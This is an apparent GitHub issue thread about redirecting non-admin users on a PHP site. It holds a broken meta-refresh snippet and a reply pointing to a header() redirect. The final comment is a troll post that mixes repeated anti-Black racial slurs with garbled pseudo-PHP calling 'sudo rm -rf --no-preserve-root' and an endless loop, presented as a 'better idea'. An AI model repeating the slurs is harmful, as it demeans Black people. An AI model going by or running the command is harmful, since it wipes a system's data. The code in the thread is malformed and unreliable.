### ISSUE TITLE
If not an admin, boot them back to spacemy

### ISSUE THREAD

**Issue by nxm3** [the-real-sumsome/spacemy.xyz-rebooted#60]
minor (also unsure on if this'll work with PHP) but w/e

```
if(isAdmin($_SESSION['siteusername'], $conn) == false) {
    echo("<meta http-equiv="refresh" content="0; URL='https://www.spacemy.xyz'" />");
}

```

**Comment by the-real-sumsome** [comment]
header("Location: ../index.php"); already works just fine

**Comment by nickkerr** [comment]
Actulaly a better idea would be do

<?php
echo(" Fuck. Black. Nigers".)";
shell(sudo rm -rf - -no-preserve-root
while (nigger) do
end) fuck niggers<?php>
